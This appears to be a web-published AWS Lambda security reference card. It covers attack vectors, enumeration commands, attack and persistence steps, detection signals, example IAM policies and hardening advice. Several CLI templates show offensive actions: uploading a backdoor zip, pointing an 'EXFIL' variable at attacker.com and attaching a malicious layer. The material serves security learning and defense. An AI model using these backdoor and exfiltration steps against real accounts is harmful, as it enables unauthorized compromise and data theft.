Category: SERVERLESS
Lambda provides serverless function execution with execution roles controlling permissions. Over-privileged roles and secrets in environment variables are the primary attack vectors.
| Risk Level | Scope | Max Timeout | Execution |
|---|---|---|---|
| HIGH | Regional | 15 min | Roles |
Lambda functions run in isolated containers with temporary credentials from the execution role. Environment variables, layers, and event data can all contain sensitive information.
Attack note: Execution roles are often overly permissive with broad S3, DynamoDB, or Secrets Manager access
Functions can be triggered by API Gateway, S3, SQS, EventBridge, and more. Function URLs provide direct HTTP access without API Gateway.
Attack note: Function URLs with NONE auth type are publicly accessible
████████░░ 7.5/10 (HIGH)
Lambda functions with over-privileged execution roles can be abused for credential theft and privilege escalation. Secrets in environment variables and code injection via event data are common vulnerabilities.
- Over-privileged execution roles
- Secrets in environment variables
- Steal credentials from context
- Function code with hardcoded keys
- Layer contains sensitive data
- Code injection via event data
- Dependency vulnerabilities
- Malicious layers
- Function URL without auth
- Deserialization attacks
- Execution role with * permissions
- PassRole to any role
- Cross-account invoke allowed
- No resource-based policy
- Unused high-privilege roles
- Function URL auth type NONE
- Secrets in plaintext env vars
- Outdated runtime versions
- No VPC configuration
- Code signing not enforced
List All Functions
aws lambda list-functionsGet Function Details
aws lambda get-function \\
--function-name NAMEGet Environment Variables
aws lambda get-function-configuration \\
--function-name NAMEList Layers
aws lambda list-layersGet Function Policy
aws lambda get-policy --function-name NAME- Invoke to steal role credentials
- Modify function code for backdoor
- Update configuration for exfil
- Attach permissive layer
- Create function with admin role
- PassRole to Lambda + CreateFunction
- Use execution role externally
- Chain to higher privilege role
- Access Secrets Manager
- Read from privileged S3
Key insight: Lambda execution roles often have access to Secrets Manager, DynamoDB, and S3 with sensitive data.
- Update function code with backdoor
- Add malicious layer
- Modify environment variables
- Create new function version
- Update alias to backdoored version
- Create S3 trigger for exfil
- Add SQS event source mapping
- EventBridge scheduled execution
- API Gateway endpoint
- CloudWatch Events rule
- UpdateFunctionCode
- UpdateFunctionConfiguration
- CreateFunction
- AddLayerVersionPermission
- CreateEventSourceMapping
- Function code changes without deploy
- New layers attached
- Unusual invocation patterns
- External IP in VPC flow logs
- Execution role used from odd IPs
Invoke Function
aws lambda invoke \\
--function-name NAME \\
--payload '{"cmd":"id"}' output.txtUpdate Function Code
aws lambda update-function-code \\
--function-name NAME \\
--zip-file fileb://backdoor.zipModify Environment Variables
aws lambda update-function-configuration \\
--function-name NAME \\
--environment 'Variables={EXFIL=attacker.com}'Add Malicious Layer
aws lambda update-function-configuration \\
--function-name NAME \\
--layers arn:aws:lambda:REGION:ACCOUNT:layer:backdoor:1Get Function Code (Download)
aws lambda get-function --function-name NAME \\
--query 'Code.Location' --output text | xargs curl -o code.zipCreate Event Source Mapping
aws lambda create-event-source-mapping \\
--function-name NAME \\
--event-source-arn arn:aws:sqs:REGION:ACCOUNT:queue{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}]
}Function has FULL AWS access - complete account compromise
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": ["s3:GetObject"],
"Resource": "arn:aws:s3:::my-bucket/input/*"
}, {
"Effect": "Allow",
"Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
"Resource": "arn:aws:logs:*:*:log-group:/aws/lambda/my-func:*"
}]
}Only specific S3 read and CloudWatch Logs access
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": "iam:PassRole",
"Resource": "*"
}]
}Can pass any role to any service - privilege escalation
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Principal": {"AWS": "arn:aws:iam::123456789012:role/APIGatewayRole"},
"Action": "lambda:InvokeFunction",
"Resource": "arn:aws:lambda:us-east-1:123456789012:function:my-func"
}]
}Only specific API Gateway role can invoke the function
Scope permissions to exact resources and actions needed.
"Resource": "arn:aws:s3:::my-bucket/prefix/*"Never store secrets in environment variables.
aws secretsmanager get-secret-value \\
--secret-id my-api-keyRequire IAM authentication for function URLs.
--auth-type AWS_IAM (not NONE)Restrict who can invoke the function.
"Principal": {"AWS": "arn:aws:iam::ACCOUNT:role/AllowedRole"}Run functions in private VPC subnets when possible.
--vpc-config SubnetIds=subnet-xxx,\\
SecurityGroupIds=sg-xxxOnly allow signed code packages to be deployed.
aws lambda create-code-signing-config \\
--allowed-publishers SigningProfileVersionArns=...AWS Lambda Security Card
Always obtain proper authorization before testing